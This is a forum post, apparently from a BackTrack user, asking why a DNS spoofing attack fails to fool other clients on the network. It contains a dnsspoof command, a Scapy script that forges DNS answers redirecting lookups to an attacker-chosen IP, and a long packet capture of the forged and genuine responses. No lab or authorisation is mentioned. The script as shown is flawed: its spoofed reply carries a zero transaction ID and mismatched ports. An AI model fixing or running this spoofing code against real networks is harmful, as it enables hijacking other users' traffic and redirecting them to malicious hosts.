Hello, BT
I am trying to do some dns spoofing using dnsspoof. simply using
does nothing, and
Code:
dnsspoof -ieth1 udp dst port 53
only fools my host (not very useful).
I tried writing a Scapy script to do the spoofing:
Code:
#!/usr/bin/env python
import socket
import scapy
import sys
from scapy.all import *
SPOOF_ADDR=sys.argv[1]
while 1 :
print 'Waiting for DNS query...'
a=sniff(filter="udp dst port 53", count=1)
request=a[0]
response=Ether(src=request.dst,dst=request.src)/IP(src=request.getlayer(IP).dst, dst=request.getlayer(IP).src)/UDP()/DNS(qr=1L, rd=1L, ra=1L, an=DNSRR(rrname=request.qd.qname, type='A', rclass='IN', ttl=10, rdata=SPOOF_ADDR),qd=request.qd)
sendp(response, iface="eth1")
This doesn't work either, but I have no idea why. The spoofed packet seems almost indistinguishable from a real response (to my eyes, at least) but the clients are not fooled.
Here is a packet log taken while running my script:
Code:
No. Time Source Destination Protocol Info
20414 1943.450319 X.X.117.233 X.X.2.26 DNS Standard query A google.com
Frame 20414: 70 bytes on wire (560 bits), 70 bytes captured (560 bits)
Ethernet II, Src: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX), Dst: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
Destination: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
Source: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
Type: IP (0x0800)
Internet Protocol, Src: X.X.117.233 (X.X.117.233), Dst: X.X.2.26 (X.X.2.26)
User Datagram Protocol, Src Port: 33250 (33250), Dst Port: domain (53)
Domain Name System (query)
[Response In: 20449]
Transaction ID: 0x4c6c
Flags: 0x0100 (Standard query)
Questions: 1
Answer RRs: 0
Authority RRs: 0
Additional RRs: 0
Queries
google.com: type A, class IN
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
No. Time Source Destination Protocol Info
20416 1943.477886 X.X.2.26 X.X.117.233 DNS Standard query response A X.X.117.233
Frame 20416: 96 bytes on wire (768 bits), 96 bytes captured (768 bits)
Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
Type: IP (0x0800)
Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
User Datagram Protocol, Src Port: domain (53), Dst Port: domain (53)
Domain Name System (response)
Transaction ID: 0x0000
Flags: 0x8180 (Standard query response, No error)
Questions: 1
Answer RRs: 1
Authority RRs: 0
Additional RRs: 0
Queries
google.com: type A, class IN
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Answers
google.com: type A, class IN, addr X.X.117.233
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Time to live: 10 seconds
Data length: 4
Addr: X.X.117.233 (X.X.117.233)
No. Time Source Destination Protocol Info
20449 1943.833154 X.X.2.26 X.X.117.233 DNS Standard query response A 74.125.67.103 A 74.125.67.104 A 74.125.67.105 A 74.125.67.106 A 74.125.67.147 A 74.125.67.99
Frame 20449: 166 bytes on wire (1328 bits), 166 bytes captured (1328 bits)
Ethernet II, Src: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY), Dst: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
Destination: HonHaiPr_XX:XX:XX (00:25:56:XX:XX:XX)
Source: Cisco_YY:YY:YY (00:1a:30:YY:YY:YY)
Type: IP (0x0800)
Internet Protocol, Src: X.X.2.26 (X.X.2.26), Dst: X.X.117.233 (X.X.117.233)
User Datagram Protocol, Src Port: domain (53), Dst Port: 33250 (33250)
Domain Name System (response)
[Request In: 20414]
[Time: 0.382835000 seconds]
Transaction ID: 0x4c6c
Flags: 0x8180 (Standard query response, No error)
Questions: 1
Answer RRs: 6
Authority RRs: 0
Additional RRs: 0
Queries
google.com: type A, class IN
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Answers
google.com: type A, class IN, addr 74.125.67.103
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Time to live: 1 minute, 24 seconds
Data length: 4
Addr: 74.125.67.103 (74.125.67.103)
google.com: type A, class IN, addr 74.125.67.104
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Time to live: 1 minute, 24 seconds
Data length: 4
Addr: 74.125.67.104 (74.125.67.104)
google.com: type A, class IN, addr 74.125.67.105
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Time to live: 1 minute, 24 seconds
Data length: 4
Addr: 74.125.67.105 (74.125.67.105)
google.com: type A, class IN, addr 74.125.67.106
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Time to live: 1 minute, 24 seconds
Data length: 4
Addr: 74.125.67.106 (74.125.67.106)
google.com: type A, class IN, addr 74.125.67.147
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Time to live: 1 minute, 24 seconds
Data length: 4
Addr: 74.125.67.147 (74.125.67.147)
google.com: type A, class IN, addr 74.125.67.99
Name: google.com
Type: A (Host address)
Class: IN (0x0001)
Time to live: 1 minute, 24 seconds
Data length: 4
Addr: 74.125.67.99 (74.125.67.99)
The first packet is the dns query from my host (nslookup google.com)
The second is the spoofed response, and the third is the actual response from the NS.
Does anybody here see my mistake? I'm at a loss.
Thanks in advance,
-d1g
DNS spoofing woes
Posting Permissions
